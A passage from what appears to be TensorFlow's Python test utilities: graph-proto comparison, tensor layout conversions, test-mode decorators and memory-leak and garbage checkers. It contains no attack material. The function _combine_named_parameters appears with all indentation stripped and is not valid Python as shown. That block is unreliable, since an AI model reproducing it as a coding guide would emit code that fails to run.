    b_value = b.collection_def[k]
    proto_type = ops.get_collection_proto_type(k)
    if proto_type:
      a_proto = proto_type()
      b_proto = proto_type()
      # Number of entries in the collections is the same
      tester.assertEqual(
          len(a_value.bytes_list.value), len(b_value.bytes_list.value))
      for (a_value_item, b_value_item) in zip(a_value.bytes_list.value,
                                              b_value.bytes_list.value):
        a_proto.ParseFromString(a_value_item)
        b_proto.ParseFromString(b_value_item)
        tester.assertProtoEquals(a_proto, b_proto)
    else:
      # FIX: use assertEqual — assertEquals is a deprecated alias removed in
      # Python 3.12.
      tester.assertEqual(a_value, b_value)
  # Compared the fields directly, remove their raw values from the
  # proto comparison below.
  a.ClearField("collection_def")
  b.ClearField("collection_def")

  # Check the graph_defs.
  assert_equal_graph_def(a.graph_def, b.graph_def, checkpoint_v2=True)
  # Check graph_def versions (ignored by assert_equal_graph_def).
  tester.assertProtoEquals(a.graph_def.versions, b.graph_def.versions)
  # Compared the fields directly, remove their raw values from the
  # proto comparison below.
  a.ClearField("graph_def")
  b.ClearField("graph_def")

  tester.assertProtoEquals(a, b)
# Matches attributes named via _SHARDED_SUFFIX in
# tensorflow/python/training/saver.py
_SHARDED_SAVE_OP_PATTERN = "_temp_[0-9a-z]{32}/part"
def _strip_checkpoint_v2_randomized(graph_def):
  """Deletes node attrs whose single string tensor value matches the randomized
  V2-checkpoint shard pattern (_SHARDED_SAVE_OP_PATTERN). Mutates graph_def."""
  for node in graph_def.node:
    keys_to_delete = []
    for attr_key in node.attr:
      tensor_value = node.attr[attr_key].tensor
      if tensor_value and len(tensor_value.string_val) == 1:
        string_value = tensor_value.string_val[0]
        if (string_value and
            re.match(_SHARDED_SAVE_OP_PATTERN, str(string_value))):
          keys_to_delete.append(attr_key)
    # Deferred deletion: can't remove keys while iterating the attr map.
    for attr_key in keys_to_delete:
      del node.attr[attr_key]
def IsGoogleCudaEnabled():
  """Returns whether the build has Google CUDA enabled (native binding)."""
  return pywrap_tensorflow.IsGoogleCudaEnabled()
def CudaSupportsHalfMatMulAndConv():
  """Returns whether CUDA supports fp16 matmul/conv (native binding)."""
  return pywrap_tensorflow.CudaSupportsHalfMatMulAndConv()
def IsMklEnabled():
  """Returns whether the build has Intel MKL enabled (native binding)."""
  return pywrap_tensorflow.IsMklEnabled()
def InstallStackTraceHandler():
  """Installs the C++ stacktrace handler via the native binding."""
  pywrap_tensorflow.InstallStacktraceHandler()
def NHWCToNCHW(input_tensor):
  """Converts the input from the NHWC format to NCHW.

  Args:
    input_tensor: a 4- or 5-D tensor, or an array representing shape

  Returns:
    converted tensor or shape array
  """
  # tensor rank -> permutation moving the channel axis right after batch
  permutations = {4: [0, 3, 1, 2], 5: [0, 4, 1, 2, 3]}
  if isinstance(input_tensor, ops.Tensor):
    perm = permutations[input_tensor.shape.ndims]
    return array_ops.transpose(input_tensor, perm)
  perm = permutations[len(input_tensor)]
  return [input_tensor[axis] for axis in perm]
def NHWCToNCHW_VECT_C(input_shape_or_tensor):
  """Transforms the input from the NHWC layout to NCHW_VECT_C layout.

  Note: Does not include quantization or type conversion steps, which should
  be applied afterwards. When given a shape list, the list is modified in
  place (the channel dimension is split into C/4 and a trailing 4).

  Args:
    input_shape_or_tensor: a 4- or 5-D tensor, or an array representing shape

  Returns:
    tensor or shape array transformed into NCHW_VECT_C

  Raises:
    ValueError: if last dimension of `input_shape_or_tensor` is not evenly
      divisible by 4.
  """
  permutations = {5: [0, 3, 1, 2, 4], 6: [0, 4, 1, 2, 3, 5]}
  is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
  shape = (
      input_shape_or_tensor.shape.as_list()
      if is_tensor else input_shape_or_tensor)
  if shape[-1] % 4 != 0:
    raise ValueError(
        "Last dimension of input must be evenly divisible by 4 to convert to "
        "NCHW_VECT_C.")
  # Split channels into (C // 4, 4); the trailing 4 is the vectorized axis.
  shape[-1] //= 4
  shape.append(4)
  perm = permutations[len(shape)]
  if is_tensor:
    reshaped = array_ops.reshape(input_shape_or_tensor, shape)
    return array_ops.transpose(reshaped, perm)
  return [shape[axis] for axis in perm]
def NCHW_VECT_CToNHWC(input_shape_or_tensor):
  """Transforms the input from the NCHW_VECT_C layout to NHWC layout.

  Note: Does not include de-quantization or type conversion steps, which should
  be applied beforehand.

  Args:
    input_shape_or_tensor: a 5- or 6-D tensor, or an array representing shape

  Returns:
    tensor or shape array transformed into NHWC

  Raises:
    ValueError: if last dimension of `input_shape_or_tensor` is not 4.
  """
  permutations = {5: [0, 2, 3, 1, 4], 6: [0, 2, 3, 4, 1, 5]}
  is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
  shape = (
      input_shape_or_tensor.shape.as_list()
      if is_tensor else input_shape_or_tensor)
  if shape[-1] != 4:
    raise ValueError("Last dimension of NCHW_VECT_C must be 4.")
  perm = permutations[len(shape)]
  # Fold the trailing vectorized axis (4) back into the channel dimension.
  nhwc_shape = [shape[axis] for axis in perm[:-1]]
  nhwc_shape[-1] *= shape[-1]
  if is_tensor:
    transposed = array_ops.transpose(input_shape_or_tensor, perm)
    return array_ops.reshape(transposed, nhwc_shape)
  return nhwc_shape
def NCHWToNHWC(input_tensor):
  """Converts the input from the NCHW format to NHWC.

  Args:
    input_tensor: a 4- or 5-D tensor, or an array representing shape

  Returns:
    converted tensor or shape array
  """
  # tensor rank -> permutation moving the channel axis to the last position
  permutations = {4: [0, 2, 3, 1], 5: [0, 2, 3, 4, 1]}
  if isinstance(input_tensor, ops.Tensor):
    perm = permutations[input_tensor.shape.ndims]
    return array_ops.transpose(input_tensor, perm)
  perm = permutations[len(input_tensor)]
  return [input_tensor[axis] for axis in perm]
def skip_if(condition):
  """Skips the decorated function if condition is or evaluates to True.

  Args:
    condition: Either an expression that can be used in "if not condition"
      statement, or a callable whose result should be a boolean.

  Returns:
    The wrapped function
  """
  import functools  # local import: keeps the module import block untouched

  def real_skip_if(fn):

    @functools.wraps(fn)  # FIX: preserve name/docstring of the wrapped test
    def wrapper(*args, **kwargs):
      if callable(condition):
        skip = condition()
      else:
        skip = condition
      if not skip:
        # FIX: propagate the return value (it was silently dropped before).
        return fn(*args, **kwargs)

    return wrapper

  return real_skip_if
def enable_c_shapes(fn):
  """No-op decorator kept for API compatibility. TODO(b/74620627): Remove this."""
  return fn
def with_c_shapes(cls):
  """No-op class decorator kept for API compatibility. TODO(b/74620627): Remove this."""
  return cls
def enable_control_flow_v2(fn):
  """Decorator for enabling CondV2 and WhileV2 on a test.

  Note this enables using CondV2 and WhileV2 after running the test class's
  setup/teardown methods.

  In addition to this, callers must import the while_v2 module in order to set
  the _while_v2 module in control_flow_ops.

  Args:
    fn: the function to be wrapped

  Returns:
    The wrapped function
  """

  def wrapper(*args, **kwargs):
    # Save the global flag, force v2 control flow on, restore no matter what.
    saved_flag = control_flow_util.ENABLE_CONTROL_FLOW_V2
    control_flow_util.ENABLE_CONTROL_FLOW_V2 = True
    try:
      fn(*args, **kwargs)
    finally:
      control_flow_util.ENABLE_CONTROL_FLOW_V2 = saved_flag

  return wrapper
def with_control_flow_v2(cls):
  """Adds methods that call original methods with WhileV2 and CondV2 enabled.

  Note this enables CondV2 and WhileV2 in new methods after running the test
  class's setup method.

  In addition to this, callers must import the while_v2 module in order to set
  the _while_v2 module in control_flow_ops.

  If a test function has _disable_control_flow_v2 attr set to True (using the
  @disable_control_flow_v2 decorator), the v2 function is not generated for it.

  Example:

  @test_util.with_control_flow_v2
  class ControlFlowTest(test.TestCase):

    def testEnabledForV2(self):
      ...

    @test_util.disable_control_flow_v2("b/xyzabc")
    def testDisabledForV2(self):
      ...

  Generated class:
  class ControlFlowTest(test.TestCase):

    def testEnabledForV2(self):
      ...

    def testEnabledForV2WithControlFlowV2(self):
      // Enable V2 flags.
      testEnabledForV2(self)
      // Restore V2 flags.

    def testDisabledForV2(self):
      ...

  Args:
    cls: class to decorate

  Returns:
    cls with new test methods added
  """
  # Nothing to do when v2 control flow is already globally enabled.
  if control_flow_util.ENABLE_CONTROL_FLOW_V2:
    return cls

  test_prefix = unittest.TestLoader.testMethodPrefix
  # Iterate over a copy: we add attributes to cls while scanning it.
  for name, attr in cls.__dict__.copy().items():
    is_test_method = callable(attr) and name.startswith(test_prefix)
    if is_test_method and not getattr(attr, "_disable_control_flow_v2", False):
      setattr(cls, name + "WithControlFlowV2", enable_control_flow_v2(attr))
  return cls
def disable_control_flow_v2(unused_msg):
  """Decorator for a function in a with_control_flow_v2 enabled test class.

  Blocks the function from being run with v2 control flow ops.

  Args:
    unused_msg: Reason for disabling.

  Returns:
    The wrapped function with _disable_control_flow_v2 attr set to True.
  """

  def mark(func):
    # Tag rather than wrap: with_control_flow_v2 only inspects this attribute.
    func._disable_control_flow_v2 = True
    return func

  return mark
def assert_no_new_pyobjects_executing_eagerly(f):
  """Decorator for asserting that no new Python objects persist after a test.

  Runs the test multiple times executing eagerly, first as a warmup and then to
  let objects accumulate. The warmup helps ignore caches which do not grow as
  the test is run repeatedly.

  Useful for checking that there are no missing Py_DECREFs in the C exercised by
  a bit of Python.
  """

  def decorator(self, **kwargs):
    """Warms up, gets an object count, runs the test, checks for new objects."""
    with context.eager_mode():
      # GC is disabled so object counts are not perturbed by collection cycles
      # racing with the measurements below.
      gc.disable()
      # Run the test 2 times as warmup, in an attempt to fill up caches, which
      # should not grow as the test is run repeatedly below.
      #
      # TODO(b/117156879): Running warmup twice is black magic; we have seen
      # tests that fail with 1 warmup run, and pass with 2, on various versions
      # of python2.7.x.
      for _ in range(2):
        f(self, **kwargs)
      gc.collect()
      # Baseline object count taken after warmup and a full collection.
      previous_count = len(gc.get_objects())
      if ops.has_default_graph():
        collection_sizes_before = {
            collection: len(ops.get_collection(collection))
            for collection in ops.get_default_graph().collections
        }
      for _ in range(3):
        f(self, **kwargs)
      # Note that gc.get_objects misses anything that isn't subject to garbage
      # collection (C types). Collections are a common source of leaks, so we
      # test for collection sizes explicitly.
      if ops.has_default_graph():
        for collection_key in ops.get_default_graph().collections:
          collection = ops.get_collection(collection_key)
          size_before = collection_sizes_before.get(collection_key, 0)
          if len(collection) > size_before:
            raise AssertionError(
                ("Collection %s increased in size from "
                 "%d to %d (current items %s).") %
                (collection_key, size_before, len(collection), collection))
          # Make sure our collection checks don't show up as leaked memory by
          # removing references to temporary variables.
          del collection
          del collection_key
          del size_before
        del collection_sizes_before
      gc.collect()
      # There should be no new Python objects hanging around.
      new_count = len(gc.get_objects())
      # In some cases (specifically on MacOS), new_count is somehow
      # smaller than previous_count.
      # Using plain assert because not all classes using this decorator
      # have assertLessEqual
      assert new_count <= previous_count, (
          "new_count(%d) is not less than or equal to previous_count(%d)" %
          (new_count, previous_count))
    gc.enable()

  return decorator
def assert_no_new_tensors(f):
  """Decorator for asserting that no new Tensors persist after a test.

  Mainly useful for checking that code using the Python C API has correctly
  manipulated reference counts.

  Clears the caches that it knows about, runs the garbage collector, then checks
  that there are no Tensor or Tensor-like objects still around. This includes
  Tensors to which something still has a reference (e.g. from missing
  Py_DECREFs) and uncollectable cycles (i.e. Python reference cycles where one
  of the objects has __del__ defined).

  Args:
    f: The test case to run.

  Returns:
    The decorated test case.
  """

  def decorator(self, **kwargs):
    """Finds existing Tensors, runs the test, checks for new Tensors."""

    def _is_tensorflow_object(obj):
      # Wrapped in try/except because gc.get_objects() can return weak proxies
      # whose referent is already gone; isinstance on those raises
      # ReferenceError.
      try:
        return isinstance(obj,
                          (ops.Tensor, variables.Variable,
                           tensor_shape.Dimension, tensor_shape.TensorShape))
      except ReferenceError:
        # If the object no longer exists, we don't care about it.
        return False

    # Snapshot, by id, every TF object alive before the test runs.
    tensors_before = set(
        id(obj) for obj in gc.get_objects() if _is_tensorflow_object(obj))
    outside_executed_eagerly = context.executing_eagerly()
    # Run the test in a new graph so that collections get cleared when it's
    # done, but inherit the graph key so optimizers behave.
    outside_graph_key = ops.get_default_graph()._graph_key
    with ops.Graph().as_default():
      ops.get_default_graph()._graph_key = outside_graph_key
      if outside_executed_eagerly:
        with context.eager_mode():
          f(self, **kwargs)
      else:
        f(self, **kwargs)
    # Make an effort to clear caches, which would otherwise look like leaked
    # Tensors.
    context.context()._clear_caches()  # pylint: disable=protected-access
    gc.collect()
    # Any TF-typed object that survived collection and was not present before
    # the test is reported as a leak.
    tensors_after = [
        obj for obj in gc.get_objects()
        if _is_tensorflow_object(obj) and id(obj) not in tensors_before
    ]
    if tensors_after:
      raise AssertionError(("%d Tensors not deallocated after test: %s" % (
          len(tensors_after),
          str(tensors_after),
      )))

  return decorator
def _find_reference_cycle(objects, idx):
  """Tries to find and log one reference cycle involving `objects[idx]`.

  Builds a referrer graph rooted at the object, then searches it for a cycle.
  When a cycle is found, a human-readable sample is written via
  `logging.error`.

  Args:
    objects: list of candidate objects (e.g. `gc.garbage`).
    idx: index of the object to start from.

  Returns:
    True if a cycle was found and logged, False otherwise.
  """

  def get_ignore_reason(obj, blacklist):
    """Tests whether an object should be omitted from the dependency graph."""
    # Cap recursion depth via the blacklist length to keep the traversal
    # bounded on very dense object graphs.
    if len(blacklist) > 100:
      return "<depth limit>"
    if tf_inspect.isframe(obj):
      if "test_util.py" in tf_inspect.getframeinfo(obj)[0]:
        return "<test code>"
    # Ignore the bookkeeping objects of this function itself (passed in as
    # the blacklist) so they do not show up as spurious referrers.
    for b in blacklist:
      if b is obj:
        return "<test code>"
    if obj is blacklist:
      return "<test code>"
    return None

  # Note: this function is meant to help with diagnostics. Its output is purely
  # a human readable representation, so you may freely modify it to suit your
  # needs.
  def describe(obj, blacklist, leaves_only=False):
    """Returns a custom human-readable summary of obj.

    Args:
      obj: the value to describe.
      blacklist: same as blacklist in get_ignore_reason.
      leaves_only: boolean flag used when calling describe recursively. Useful
        for summarizing collections.
    """
    if get_ignore_reason(obj, blacklist):
      return "{}{}".format(get_ignore_reason(obj, blacklist), type(obj))
    if tf_inspect.isframe(obj):
      return "frame: {}".format(tf_inspect.getframeinfo(obj))
    elif tf_inspect.ismodule(obj):
      return "module: {}".format(obj.__name__)
    else:
      if leaves_only:
        return "{}, {}".format(type(obj), id(obj))
      elif isinstance(obj, list):
        return "list({}): {}".format(
            id(obj), [describe(e, blacklist, leaves_only=True) for e in obj])
      elif isinstance(obj, tuple):
        return "tuple({}): {}".format(
            id(obj), [describe(e, blacklist, leaves_only=True) for e in obj])
      elif isinstance(obj, dict):
        return "dict({}): {} keys".format(id(obj), len(obj.keys()))
      elif tf_inspect.isfunction(obj):
        return "function({}) {}; globals ID: {}".format(
            id(obj), obj.__name__, id(obj.__globals__))
      else:
        return "{}, {}".format(type(obj), id(obj))

  def build_ref_graph(obj, graph, reprs, blacklist):
    """Builds a reference graph as <referrer> -> <list of refferents>.

    Args:
      obj: The object to start from. The graph will be built by recursively
        adding its referrers.
      graph: Dict holding the graph to be built. To avoid creating extra
        references, the graph holds object IDs rather than actual objects.
      reprs: Auxiliary structure that maps object IDs to their human-readable
        description.
      blacklist: List of objects to ignore.
    """
    referrers = gc.get_referrers(obj)
    # The referrers list itself must be excluded from the graph.
    blacklist = blacklist + (referrers,)
    obj_id = id(obj)
    for r in referrers:
      if get_ignore_reason(r, blacklist) is None:
        r_id = id(r)
        if r_id not in graph:
          graph[r_id] = []
        if obj_id not in graph[r_id]:
          # Recurse only the first time an edge is seen; this makes the
          # traversal terminate even though the object graph is cyclic.
          graph[r_id].append(obj_id)
          build_ref_graph(r, graph, reprs, blacklist)
          reprs[r_id] = describe(r, blacklist)

  def find_cycle(el, graph, reprs, path):
    """Finds and prints a single cycle in the dependency graph."""
    if el not in graph:
      return
    for r in graph[el]:
      if r in path:
        # Revisiting a node already on the current path means a cycle; log it.
        logging.error("Reference cycle sample:")
        for p in path + (r,):
          logging.error(reprs.get(p, "unknown object " + str(p)))
        return True
      else:
        if find_cycle(r, graph, reprs, path + (r,)):
          return True
    return False

  obj = objects[idx]

  graph = {}  # referrer ID -> object ID
  reprs = {}  # object ID -> description
  build_ref_graph(obj, graph, reprs, (objects, graph, reprs, get_ignore_reason,
                                      describe, build_ref_graph, find_cycle))
  for k in graph:
    if find_cycle(k, graph, reprs, ()):
      return True
  return False
def assert_no_garbage_created(f):
  """Test method decorator to assert that no garbage has been created.

  Note that this decorator sets DEBUG_SAVEALL, which in some Python interpreters
  cannot be un-set (i.e. will disable garbage collection for any other unit
  tests in the same file/shard).

  Args:
    f: The function to decorate.

  Returns:
    The decorated function.
  """

  def decorator(self, **kwargs):
    """Sets DEBUG_SAVEALL, runs the test, and checks for new garbage."""
    # Force-load `distribution_strategy_context` to prevent GC at
    # test time when using eager. Remove once b/117329403 is resolved.
    tape.distribution_strategy_context.get_distribution_strategy()
    gc.disable()
    previous_debug_flags = gc.get_debug()
    # DEBUG_SAVEALL keeps unreachable objects in gc.garbage instead of freeing
    # them, so cycles created by the test become observable below.
    gc.set_debug(gc.DEBUG_SAVEALL)
    gc.collect()
    previous_garbage = len(gc.garbage)
    f(self, **kwargs)
    gc.collect()
    new_garbage = len(gc.garbage)
    if new_garbage > previous_garbage:
      logging.error(
          "The decorated test created work for Python's garbage collector, "
          "likely due to a reference cycle. New objects in cycle(s):")
      for i, obj in enumerate(gc.garbage[previous_garbage:]):
        try:
          logging.error("Object %d of %d", i,
                        len(gc.garbage) - previous_garbage)

          def _safe_object_str(obj):
            # Summarize by class name and id; avoids calling repr() on
            # arbitrary (possibly broken) objects.
            return "<%s %d>" % (obj.__class__.__name__, id(obj))

          logging.error(" Object type: %s", _safe_object_str(obj))
          logging.error(
              " Referrer types: %s", ", ".join(
                  [_safe_object_str(ref) for ref in gc.get_referrers(obj)]))
          logging.error(
              " Referent types: %s", ", ".join(
                  [_safe_object_str(ref) for ref in gc.get_referents(obj)]))
          logging.error(" Object attribute names: %s", dir(obj))
          logging.error(" Object __str__:")
          logging.error(obj)
          logging.error(" Object __repr__:")
          logging.error(repr(obj))
        except Exception:  # pylint: disable=broad-except
          logging.error("(Exception while printing object)")
    # When garbage is created, this call can help identify reference cycles,
    # which are typically the cause of such garbage.
    if new_garbage > previous_garbage:
      for i in range(previous_garbage, new_garbage):
        if _find_reference_cycle(gc.garbage, i):
          break
    # This will fail if any garbage has been created, typically because of a
    # reference cycle.
    self.assertEqual(previous_garbage, new_garbage)
    # TODO(allenl): Figure out why this debug flag reset doesn't work. It would
    # be nice to be able to decorate arbitrary tests in a large test suite and
    # not hold on to every object in other tests.
    gc.set_debug(previous_debug_flags)
    gc.enable()

  return decorator
def _combine_named_parameters(**kwargs):
"""Generate combinations based on its keyword arguments.
Two sets of returned combinations can be concatenated using +. Their product
can be computed using `times()`.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]`
or `option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
if not kwargs:
return [OrderedDict()]
sort_by_key = lambda k: k[0][0]
kwargs = OrderedDict(sorted(kwargs.items(), key=sort_by_key))
first = list(kwargs.items())[0]
rest = dict(list(kwargs.items())[1:])
rest_combined = _combine_named_parameters(**rest)
key = first[0]
values = first[1]
if not isinstance(values, list):
values = [values]
combinations = [
OrderedDict(sorted(list(combined.items()) + [(key, v)], key=sort_by_key))
for v in values
for combined in rest_combined
]
return combinations
def generate_combinations_with_testcase_name(**kwargs):
  """Generate combinations based on its keyword arguments using combine().

  This function calls combine() and appends a testcase name to the list of
  dictionaries returned. The 'testcase_name' key is a required for named
  parameterized tests.

  Args:
    **kwargs: keyword arguments of form `option=[possibilities, ...]`
      or `option=the_only_possibility`.

  Returns:
    a list of dictionaries for each combination. Keys in the dictionaries are
    the keyword argument names. Each key has one value - one of the
    corresponding keyword argument values.
  """
  named_combinations = []
  for combination in _combine_named_parameters(**kwargs):
    assert isinstance(combination, OrderedDict)
    # Build a "_<key>_<value>" suffix from the alphanumeric characters of
    # every option, in combination order.
    suffix = ""
    for key, value in combination.items():
      alnum_key = "".join(filter(str.isalnum, key))
      alnum_value = "".join(filter(str.isalnum, str(value)))
      suffix += "_{}_{}".format(alnum_key, alnum_value)
    entries = list(combination.items())
    entries.append(("testcase_name", "_test{}".format(suffix)))
    named_combinations.append(OrderedDict(entries))
  return named_combinations
def run_all_in_graph_and_eager_modes(cls):
  """Execute all test methods in the given class with and without eager.

  Methods whose names start with "testSkipEager" or "test_skip_eager" are
  left untouched.

  Args:
    cls: the test class whose methods are wrapped in place.

  Returns:
    The same class, with its test methods decorated.
  """
  wrap = run_in_graph_and_eager_modes
  # Snapshot the items first: setattr below mutates cls.__dict__.
  for name, value in list(cls.__dict__.items()):
    if not callable(value):
      continue
    if not name.startswith(unittest.TestLoader.testMethodPrefix):
      continue
    if name.startswith("testSkipEager") or name.startswith("test_skip_eager"):
      continue
    setattr(cls, name, wrap(value))
  return cls
def run_in_graph_and_eager_modes(func=None,
                                 config=None,
                                 use_gpu=True,
                                 reset_test=True,
                                 assert_no_eager_garbage=False):
  """Execute the decorated test with and without enabling eager execution.

  This function returns a decorator intended to be applied to test methods in
  a `tf.test.TestCase` class. Doing so will cause the contents of the test
  method to be executed twice - once normally, and once with eager execution
  enabled. This allows unittests to confirm the equivalence between eager
  and graph execution (see `tf.enable_eager_execution`).

  For example, consider the following unittest:

  ```python
  class MyTests(tf.test.TestCase):

    @run_in_graph_and_eager_modes
    def test_foo(self):
      x = tf.constant([1, 2])
      y = tf.constant([3, 4])
      z = tf.add(x, y)
      self.assertAllEqual([4, 6], self.evaluate(z))

  if __name__ == "__main__":
    tf.test.main()
  ```

  This test validates that `tf.add()` has the same behavior when computed with
  eager execution enabled as it does when constructing a TensorFlow graph and
  executing the `z` tensor in a session.

  Args:
    func: function to be annotated. If `func` is None, this method returns a
      decorator the can be applied to a function. If `func` is not None this
      returns the decorator applied to `func`.
    config: An optional config_pb2.ConfigProto to use to configure the
      session when executing graphs.
    use_gpu: If True, attempt to run as many operations as possible on GPU.
    reset_test: If True, tearDown and SetUp the test case between the two
      executions of the test (once with and once without eager execution).
    assert_no_eager_garbage: If True, sets DEBUG_SAVEALL on the garbage
      collector and asserts that no extra garbage has been created when running
      the test with eager execution enabled. This will fail if there are
      reference cycles (e.g. a = []; a.append(a)). Off by default because some
      tests may create garbage for legitimate reasons (e.g. they define a class
      which inherits from `object`), and because DEBUG_SAVEALL is sticky in some
      Python interpreters (meaning that tests which rely on objects being
      collected elsewhere in the unit test file will not work). Additionally,
      checks that nothing still has a reference to Tensors that the test
      allocated.

  Returns:
    Returns a decorator that will run the decorated test method twice:
    once by constructing and executing a graph in a session and once with
    eager execution enabled.
  """

  def decorator(f):
    if tf_inspect.isclass(f):
      raise ValueError(
          "`run_in_graph_and_eager_modes` only supports test methods. "
          "Did you mean to use `run_all_in_graph_and_eager_modes`?")

    def decorated(self, *args, **kwargs):
      # First run: graph mode inside a test session. A SkipTest raised here is
      # deliberately swallowed so that the eager variant below still runs.
      try:
        with context.graph_mode():
          with self.test_session(use_gpu=use_gpu, config=config):
            f(self, *args, **kwargs)
      except unittest.case.SkipTest:
        pass

      def run_eagerly(self, **kwargs):
        # Pin to CPU when the caller asked not to use the GPU; otherwise let
        # placement fall through to the default device.
        if not use_gpu:
          with ops.device("/device:CPU:0"):
            f(self, *args, **kwargs)
        else:
          f(self, *args, **kwargs)

      if assert_no_eager_garbage:
        ops.reset_default_graph()
        run_eagerly = assert_no_new_tensors(
            assert_no_garbage_created(run_eagerly))

      if reset_test:
        # This decorator runs the wrapped test twice.
        # Reset the test environment between runs.
        self.tearDown()
        self._tempdir = None
      # Create a new graph for the eagerly executed version of this test for
      # better isolation.
      graph_for_eager_test = ops.Graph()
      with graph_for_eager_test.as_default(), context.eager_mode():
        if reset_test:
          self.setUp()
        run_eagerly(self, **kwargs)
      ops.dismantle_graph(graph_for_eager_test)

    return decorated

  if func is not None:
    return decorator(func)

  return decorator
def py_func_if_in_function(f):
  """Wraps `f` in a py_func when invoked while building a function graph.

  Outside of function building, `f` is called directly. Inside, Tensor and
  Variable positional arguments are routed through `script_ops.py_func` so
  `f` receives concrete values at execution time.
  """

  def decorated(*args, **kwds):
    if not ops.get_default_graph()._building_function:
      return f(*args, **kwds)

    # Collect the Tensor-like positional args (and their positions) so only
    # they cross the py_func boundary.
    tensor_args, tensor_indices = zip(
        *[(x, i) for i, x in enumerate(args)
          if isinstance(x, (ops.Tensor, variables.Variable))])

    def inner_f(*inner_tensor_args):
      my_args = list(args)
      # Substitute the resolved values back into their original positions.
      for i, n in zip(tensor_indices, inner_tensor_args):
        my_args[i] = n
      return f(*my_args, **kwds)

    return script_ops.py_func(inner_f, tensor_args, [])

  return tf_decorator.make_decorator(f, decorated)
def also_run_as_tf_function(f):
  """Runs the decorated test twice--once as is, once inside a tf.function.

  This allows you to run a test both in eager execution and inside a
  tf.function, exercising the two execution modes supported in tf 2.0. The test
  assertions are automatically done inside tf.py_funcs, and tf.function ensures
  that they run in the proper order and with the proper side effects.

  Currently variable creation is not supported in tests annotated with this
  decorator since it's tricky to ensure the variable doesn't get repeatedly
  created when retracing the tf.function.

  Args:
    f: the test method to be decorated

  Returns:
    The decorated test method, which will run both in eager and inside a
    tf.function.
  """

  def decorated(*args, **kwds):
    with context.eager_mode():
      # Pass 1: plain eager execution.
      f(*args, **kwds)
      # Pass 2: trace `f` into a tf.function and execute the traced version.
      def_function.function(f)(*args, **kwds)

  return decorated
def run_deprecated_v1(func=None):
  """Execute the decorated test in graph mode.

  This function returns a decorator intended to be applied to tests that have
  not been updated to a style that is compatible with both TensorFlow 1.x and
  2.x. When this decorated is applied, the test body will be run in
  an environment where API calls construct graphs instead of executing eagerly.

  Args:
    func: function to be annotated. If `func` is None, this method returns a
      decorator the can be applied to a function. If `func` is not None this
      returns the decorator applied to `func`.

  Returns:
    Returns a decorator that will run the decorated test method in graph mode.
  """

  def decorator(f):
    if tf_inspect.isclass(f):
      raise ValueError("`run_deprecated_v1` only supports test methods.")

    def decorated(self, *args, **kwargs):
      # Under TF1 the default environment is already graph mode, so only force
      # graph mode when TF2 behavior is enabled.
      if not tf2.enabled():
        f(self, *args, **kwargs)
        return
      with context.graph_mode():
        f(self, *args, **kwargs)

    return decorated

  return decorator if func is None else decorator(func)
def run_v1_only(reason, func=None):
  """Execute the decorated test only if running in v1 mode.

  This function is intended to be applied to tests that exercise v1 only
  functionality. If the test is run in v2 mode it will simply be skipped.

  Args:
    reason: string giving a reason for limiting the test to v1 only.
    func: function to be annotated. If `func` is None, this method returns a
      decorator the can be applied to a function. If `func` is not None this
      returns the decorator applied to `func`.

  Returns:
    Returns a decorator that will conditionally skip the decorated test method.
  """

  def decorator(f):
    if tf_inspect.isclass(f):
      # Applied to a class: wrap setUp (when defined directly on the class)
      # and every test method, then return the class itself.
      setup = f.__dict__.get("setUp")
      if setup is not None:
        setattr(f, "setUp", decorator(setup))

      for name, value in list(f.__dict__.items()):
        if callable(value) and name.startswith(
            unittest.TestLoader.testMethodPrefix):
          setattr(f, name, decorator(value))

      return f

    def decorated(self, *args, **kwargs):
      if tf2.enabled():
        self.skipTest(reason)
      f(self, *args, **kwargs)

    return decorated

  return decorator if func is None else decorator(func)
def run_v2_only(func=None):
  """Execute the decorated test only if running in v2 mode.

  This function is intended to be applied to tests that exercise v2 only
  functionality. If the test is run in v1 mode it will simply be skipped.

  Args:
    func: function to be annotated. If `func` is None, this method returns a
      decorator that can be applied to a function. If `func` is not None this
      returns the decorator applied to `func`.

  Returns:
    Returns a decorator that will conditionally skip the decorated test method.
  """

  def decorator(f):
    if tf_inspect.isclass(f):
      raise ValueError("`run_v2_only` only supports test methods.")

    def decorated(self, *args, **kwargs):
      if not tf2.enabled():
        # Fixed typo in the skip message (was "comptaible").
        self.skipTest("Test is only compatible with v2")
      f(self, *args, **kwargs)

    return decorated

  if func is not None:
    return decorator(func)
  return decorator
def run_gpu_only(func=None):
  """Execute the decorated test only if a GPU is available.

  This function is intended to be applied to tests that require the presence
  of a GPU. If a GPU is absent, it will simply be skipped.

  Args:
    func: function to be annotated. If `func` is None, this method returns a
      decorator that can be applied to a function. If `func` is not None this
      returns the decorator applied to `func`.

  Returns:
    Returns a decorator that will conditionally skip the decorated test method.
  """

  def decorator(f):
    if tf_inspect.isclass(f):
      raise ValueError("`run_gpu_only` only supports test methods.")

    def decorated(self, *args, **kwargs):
      if not is_gpu_available():
        self.skipTest("Test requires GPU")
      f(self, *args, **kwargs)

    return decorated

  return decorator if func is None else decorator(func)
def run_cuda_only(func=None):
  """Execute the decorated test only if a CUDA GPU is available.

  This function is intended to be applied to tests that require the presence
  of a CUDA GPU. If a CUDA GPU is absent, it will simply be skipped.

  Args:
    func: function to be annotated. If `func` is None, this method returns a
      decorator that can be applied to a function. If `func` is not None this
      returns the decorator applied to `func`.

  Returns:
    Returns a decorator that will conditionally skip the decorated test method.
  """

  def decorator(f):
    if tf_inspect.isclass(f):
      raise ValueError("`run_cuda_only` only supports test methods.")

    def decorated(self, *args, **kwargs):
      if not is_gpu_available(cuda_only=True):
        self.skipTest("Test requires CUDA GPU")
      f(self, *args, **kwargs)

    return decorated

  return decorator if func is None else decorator(func)
@tf_export("test.is_gpu_available")
def is_gpu_available(cuda_only=False, min_cuda_compute_capability=None):
  """Returns whether TensorFlow can access a GPU.

  Args:
    cuda_only: limit the search to CUDA gpus.
    min_cuda_compute_capability: a (major,minor) pair that indicates the minimum
      CUDA compute capability required, or None if no requirement.

  Returns:
    True iff a gpu device of the requested kind is available.
  """

  def compute_capability_from_device_desc(device_desc):
    # Parses "compute capability: X.Y" out of a device description string,
    # returning (0, 0) when the pattern is absent.
    # TODO(jingyue): The device description generator has to be in sync with
    # this file. Another option is to put compute capability in
    # DeviceAttributes, but I avoided that to keep DeviceAttributes
